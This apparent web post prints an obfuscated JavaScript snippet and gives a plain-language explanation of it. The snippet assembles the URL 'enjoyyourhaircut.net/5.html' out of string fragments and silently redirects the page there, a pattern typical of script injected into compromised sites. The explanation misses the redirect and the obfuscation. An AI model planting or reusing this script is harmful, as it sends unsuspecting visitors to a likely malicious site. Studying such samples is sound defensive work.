The code defines a function `c()` and creates an instance...

March 29, 2023 at 07:35 AM

<script>function c(){};t=false;kM="kM"; c.prototype = {v : function() {this.e=38741;this.eE="";s='';wS="wS";u=""; h=false;y="y";var w=String("htsjRD".substr(0,2)+"k8V3tp3kV8".substr(4,2)+ ":/VxWG".substr(0,2)+"/e"+"nj"+"oydAgE".substr(0,2)+"yo6C3".substr(0,2)+ "urMoc".substr(0,2)+"Q8eDha8eDQ".substr(4,2)+"ir"+"cum1nF".substr(0,2)+ "UmI9t.UIm9".substr(4,2)+"ne"+"t/"+"5.U2mW".substr(0,2)+"TaShtSaT".substr(3,2) +"cwzmlcwz".substr(3,2));z=false;i=22164;d="";this.b="b";var r=false;zC=false; m='';document["locazLsR".substr(0,4)+"tion"]=w;var eG=false;this.k='';q=5975; g=55201;this.p="";var iK=61242;var n=false;}};var nF=false;this.eF=false; var x=new c(); l="l";gO="";x.v();this.kN=false;</script>

The code defines a function c() and creates an instance of its prototype by assigning the v() method to it. The v() method sets variables with various string values and numbers and sets the "location" property of the document to a long string. Finally, it creates an instance of c() and calls its v() method.

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